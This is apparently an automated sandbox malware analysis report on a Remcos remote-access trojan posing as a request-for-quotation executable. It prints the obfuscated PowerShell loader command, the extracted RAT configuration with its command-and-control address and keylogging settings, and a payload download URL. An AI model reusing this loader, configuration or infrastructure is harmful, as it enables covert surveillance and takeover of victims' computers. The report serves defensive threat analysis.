Edit tour

Windows Analysis Report
INTECH RFQ EN241813.exe

Overview

General Information

Sample name:	INTECH RFQ EN241813.exe
Analysis ID:	1566703
MD5:	f9848165fbabe0f8b34fb5d830b2fecc
SHA1:	2c53840921153910eb84270e4e12d07e82b1451d
SHA256:	a19b171658151c4a4af32dd17474a8184cc37a0d99138ae540177e15cebd9093
Tags:	exeRATRemcosRATuser-abuse_ch
Infos:

Detection

Remcos

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Detected Remcos RAT

Early bird code injection technique detected

Found malware configuration

Sigma detected: Remcos

Suricata IDS alerts for network traffic

Yara detected Remcos RAT

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Found suspicious powershell code related to unpacking or dynamic code loading

Initial sample is a PE file and has a suspicious name

Installs a global keyboard hook

Loading BitLocker PowerShell Module

Queues an APC in another process (thread injection)

Sample uses process hollowing technique

Writes to foreign memory regions

Checks if the current process is being debugged

Contains functionality for read data from the clipboard

Contains functionality to dynamically determine API calls

Contains functionality to shutdown / reboot the system

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: Msiexec Initiated Connection

Suricata IDS alerts with low severity for network traffic

Too many similar processes found

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Classification

Process Tree

System is w10x64

INTECH RFQ EN241813.exe (PID: 4576 cmdline: "C:\Users\user\Desktop\INTECH RFQ EN241813.exe" MD5: F9848165FBABE0F8B34FB5D830B2FECC)

powershell.exe (PID: 2728 cmdline: "powershell.exe" -windowstyle minimized "$Sontag=gc -Raw 'C:\Users\user\AppData\Roaming\Mirror\radials.Glu';$Dividivis=$Sontag.SubString(54192,3);.$Dividivis($Sontag)" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 4088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

msiexec.exe (PID: 5772 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)

msiexec.exe (PID: 5328 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc" MD5: 9D09DC1EDA745A5F87553048E57620CF)

msiexec.exe (PID: 5204 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc" MD5: 9D09DC1EDA745A5F87553048E57620CF)

msiexec.exe (PID: 5876 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc" MD5: 9D09DC1EDA745A5F87553048E57620CF)

msiexec.exe (PID: 5924 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc" MD5: 9D09DC1EDA745A5F87553048E57620CF)

msiexec.exe (PID: 6392 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc" MD5: 9D09DC1EDA745A5F87553048E57620CF)

msiexec.exe (PID: 5292 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc" MD5: 9D09DC1EDA745A5F87553048E57620CF)

msiexec.exe (PID: 3320 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc" MD5: 9D09DC1EDA745A5F87553048E57620CF)

msiexec.exe (PID: 5948 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc" MD5: 9D09DC1EDA745A5F87553048E57620CF)

msiexec.exe (PID: 2276 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc" MD5: 9D09DC1EDA745A5F87553048E57620CF)

msiexec.exe (PID: 1088 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc" MD5: 9D09DC1EDA745A5F87553048E57620CF)

msiexec.exe (PID: 2036 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc" MD5: 9D09DC1EDA745A5F87553048E57620CF)

msiexec.exe (PID: 5588 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc" MD5: 9D09DC1EDA745A5F87553048E57620CF)

msiexec.exe (PID: 5608 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc" MD5: 9D09DC1EDA745A5F87553048E57620CF)

msiexec.exe (PID: 3428 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc" MD5: 9D09DC1EDA745A5F87553048E57620CF)

msiexec.exe (PID: 948 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc" MD5: 9D09DC1EDA745A5F87553048E57620CF)

msiexec.exe (PID: 5728 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc" MD5: 9D09DC1EDA745A5F87553048E57620CF)

msiexec.exe (PID: 2784 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc" MD5: 9D09DC1EDA745A5F87553048E57620CF)

msiexec.exe (PID: 6008 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc" MD5: 9D09DC1EDA745A5F87553048E57620CF)

msiexec.exe (PID: 6244 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc" MD5: 9D09DC1EDA745A5F87553048E57620CF)

msiexec.exe (PID: 340 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc" MD5: 9D09DC1EDA745A5F87553048E57620CF)

msiexec.exe (PID: 6944 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc" MD5: 9D09DC1EDA745A5F87553048E57620CF)

msiexec.exe (PID: 7100 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc" MD5: 9D09DC1EDA745A5F87553048E57620CF)

msiexec.exe (PID: 7028 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc" MD5: 9D09DC1EDA745A5F87553048E57620CF)

msiexec.exe (PID: 7000 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc" MD5: 9D09DC1EDA745A5F87553048E57620CF)

msiexec.exe (PID: 5024 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc" MD5: 9D09DC1EDA745A5F87553048E57620CF)

msiexec.exe (PID: 6864 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc" MD5: 9D09DC1EDA745A5F87553048E57620CF)

msiexec.exe (PID: 6084 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc" MD5: 9D09DC1EDA745A5F87553048E57620CF)

msiexec.exe (PID: 5840 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc" MD5: 9D09DC1EDA745A5F87553048E57620CF)

msiexec.exe (PID: 6044 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc" MD5: 9D09DC1EDA745A5F87553048E57620CF)

msiexec.exe (PID: 3040 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc" MD5: 9D09DC1EDA745A5F87553048E57620CF)

msiexec.exe (PID: 4872 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc" MD5: 9D09DC1EDA745A5F87553048E57620CF)

msiexec.exe (PID: 3384 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc" MD5: 9D09DC1EDA745A5F87553048E57620CF)

msiexec.exe (PID: 1584 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc" MD5: 9D09DC1EDA745A5F87553048E57620CF)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Remcos, RemcosRAT	Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.	APT33 The Gorgon Group UAC-0050	http://malware-traffic-analysis.net/2017/12/22/index.html https://0xmrmagnezi.github.io/malware%20analysis/RemcosRAT/ https://asec.ahnlab.com/en/32376/ https://asec.ahnlab.com/ko/25837/ https://asec.ahnlab.com/ko/32101/	https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": ["69.61.31.229:2404:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-EPE0FD", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
C:\ProgramData\remcos\logs.dat	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000007.00000002.3373300576.000000002495F000.00000004.00000010.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000007.00000002.3361750850.0000000008E5A000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000007.00000002.3361750850.0000000008E9F000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000007.00000002.3361750850.0000000008EB7000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Process Memory Space: msiexec.exe PID: 5772	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security

Sigma Signatures

System Summary

Sigma detected: Msiexec Initiated Connection

Source: Network Connection

Author: frack113: Data: DestinationIp: 104.168.7.16, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 5772, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49846

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -windowstyle minimized "$Sontag=gc -Raw 'C:\Users\user\AppData\Roaming\Mirror\radials.Glu';$Dividivis=$Sontag.SubString(54192,3);.$Dividivis($Sontag)", CommandLine: "powershell.exe" -windowstyle minimized "$Sontag=gc -Raw 'C:\Users\user\AppData\Roaming\Mirror\radials.Glu';$Dividivis=$Sontag.SubString(54192,3);.$Dividivis($Sontag)", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\INTECH RFQ EN241813.exe", ParentImage: C:\Users\user\Desktop\INTECH RFQ EN241813.exe, ParentProcessId: 4576, ParentProcessName: INTECH RFQ EN241813.exe, ProcessCommandLine: "powershell.exe" -windowstyle minimized "$Sontag=gc -Raw 'C:\Users\user\AppData\Roaming\Mirror\radials.Glu';$Dividivis=$Sontag.SubString(54192,3);.$Dividivis($Sontag)", ProcessId: 2728, ProcessName: powershell.exe

Stealing of Sensitive Information

Sigma detected: Remcos

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Windows\SysWOW64\msiexec.exe, ProcessId: 5772, TargetFilename: C:\ProgramData\remcos\logs.dat

Suricata Signatures

ET JA3 Hash - Remcos 3.x/4.x TLS Connection

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-02T15:49:08.164394+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.6	49853	69.61.31.229	2404	TCP
2024-12-02T15:49:10.336366+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.6	49859	69.61.31.229	2404	TCP

ETPRO MALWARE Common Downloader Header Pattern HCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-02T15:49:10.660518+0100	2803304	3	Unknown Traffic	192.168.2.6	49861	178.237.33.50	80	TCP

ETPRO MALWARE Common Downloader Header Pattern UHCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-02T15:49:04.894012+0100	2803270	2	Potentially Bad Traffic	192.168.2.6	49846	104.168.7.16	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000007.00000002.3361750850.0000000008E9F000.00000004.00000020.00020000.00000000.sdmp

Malware Configuration Extractor: Remcos {"Host:Port:Password": ["69.61.31.229:2404:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-EPE0FD", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}

Yara detected Remcos RAT

Source: Yara match	File source: 00000007.00000002.3373300576.000000002495F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3361750850.0000000008E5A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3361750850.0000000008E9F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3361750850.0000000008EB7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: msiexec.exe PID: 5772, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\remcos\logs.dat, type: DROPPED

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.8% probability

Source: INTECH RFQ EN241813.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: C:\Users\user\Desktop\INTECH RFQ EN241813.exe	Code function: 0_2_00402647 FindFirstFileA,	0_2_00402647
Source: C:\Users\user\Desktop\INTECH RFQ EN241813.exe	Code function: 0_2_00405FE4 FindFirstFileA,FindClose,	0_2_00405FE4
Source: C:\Users\user\Desktop\INTECH RFQ EN241813.exe	Code function: 0_2_004055A0 CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,	0_2_004055A0

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49859 -> 69.61.31.229:2404
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49853 -> 69.61.31.229:2404

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

IPs: 69.61.31.229

Source: global traffic

TCP traffic: 192.168.2.6:49853 -> 69.61.31.229:2404

Source: global traffic

HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache

Source: Joe Sandbox View

IP Address: 178.237.33.50 178.237.33.50

Source: Joe Sandbox View

ASN Name: GLOBALCOMPASSUS GLOBALCOMPASSUS

Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.6:49846 -> 104.168.7.16:80
Source: Network traffic	Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.6:49861 -> 178.237.33.50:80

Source: global traffic

HTTP traffic detected: GET /wvINIwTIDedSXoITN141.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: 104.168.7.16Cache-Control: no-cache

Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.16
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.16
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.16
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.16
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.16
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.16
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.16
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.16
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.16
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.16
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.16
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.16
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.16
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.16
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.16
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.16
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.16
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.16
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.16
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.16
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.16
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.16
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.16
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.16
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.16
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.16
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.16
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.16
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.16
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.16
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.16
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.16
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.16
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.16
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.16
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.16
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.16
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.16
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.16
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.16
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.16
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.16
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.16
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.16
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.16
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.16
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.16
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.16
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.16
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.16

Source: global traffic	HTTP traffic detected: GET /wvINIwTIDedSXoITN141.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: 104.168.7.16Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache

Source: msiexec.exe, 00000007.00000002.3373499400.0000000024AF0000.00000040.10000000.00040000.00000000.sdmp	String found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
Source: msiexec.exe, 00000007.00000002.3373499400.0000000024AF0000.00000040.10000000.00040000.00000000.sdmp	String found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)

Source: global traffic

DNS traffic detected: DNS query: geoplugin.net

Source: msiexec.exe, 00000007.00000002.3361750850.0000000008E5A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.3372869237.0000000024140000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://104.168.7.16/wvINIwTIDedSXoITN141.bin
Source: msiexec.exe, 00000007.00000002.3361750850.0000000008EB7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gp
Source: msiexec.exe, 00000007.00000002.3361750850.0000000008EB7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gp9
Source: msiexec.exe, 00000007.00000002.3361750850.0000000008EB7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gpF~
Source: msiexec.exe, 00000007.00000002.3361750850.0000000008E9F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gphy
Source: msiexec.exe, 00000007.00000002.3361750850.0000000008E9F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gpkL
Source: msiexec.exe, 00000007.00000003.2853394305.0000000008EED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gpq
Source: INTECH RFQ EN241813.exe	String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: INTECH RFQ EN241813.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: msiexec.exe, 00000007.00000002.3373499400.0000000024AF0000.00000040.10000000.00040000.00000000.sdmp	String found in binary or memory: http://www.ebuddy.com
Source: msiexec.exe, 00000007.00000002.3373499400.0000000024AF0000.00000040.10000000.00040000.00000000.sdmp	String found in binary or memory: http://www.imvu.com
Source: msiexec.exe, 00000007.00000002.3373499400.0000000024AF0000.00000040.10000000.00040000.00000000.sdmp	String found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
Source: msiexec.exe, 00000007.00000002.3373499400.0000000024AF0000.00000040.10000000.00040000.00000000.sdmp	String found in binary or memory: http://www.imvu.comr
Source: msiexec.exe, 00000007.00000002.3373499400.0000000024AF0000.00000040.10000000.00040000.00000000.sdmp	String found in binary or memory: http://www.nirsoft.net/
Source: msiexec.exe, 00000007.00000002.3373499400.0000000024AF0000.00000040.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.google.com

Key, Mouse, Clipboard, Microphone and Screen Capturing

Installs a global keyboard hook

Source: C:\Windows\SysWOW64\msiexec.exe

Windows user hook set: 0 keyboard low level C:\Windows\System32\msiexec.exe

Source: C:\Users\user\Desktop\INTECH RFQ EN241813.exe	Code function: 0_2_00404948		0_2_00404948
Source: C:\Users\user\Desktop\INTECH RFQ EN241813.exe	Code function: 0_2_004062BA		0_2_004062BA

Source: INTECH RFQ EN241813.exe, 00000000.00000000.2089778793.000000000043C000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamebrnefdslerne.exeF vs INTECH RFQ EN241813.exe
Source: INTECH RFQ EN241813.exe	Binary or memory string: OriginalFilenamebrnefdslerne.exeF vs INTECH RFQ EN241813.exe

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\SysWOW64\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Rmc-EPE0FD
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4088:120:WilError_03

Source: C:\Users\user\Desktop\INTECH RFQ EN241813.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\INTECH RFQ EN241813.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\INTECH RFQ EN241813.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\INTECH RFQ EN241813.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\INTECH RFQ EN241813.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\INTECH RFQ EN241813.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\INTECH RFQ EN241813.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\INTECH RFQ EN241813.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\INTECH RFQ EN241813.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\INTECH RFQ EN241813.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\INTECH RFQ EN241813.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\INTECH RFQ EN241813.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\INTECH RFQ EN241813.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\INTECH RFQ EN241813.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\INTECH RFQ EN241813.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\INTECH RFQ EN241813.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\INTECH RFQ EN241813.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\INTECH RFQ EN241813.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\INTECH RFQ EN241813.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\INTECH RFQ EN241813.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
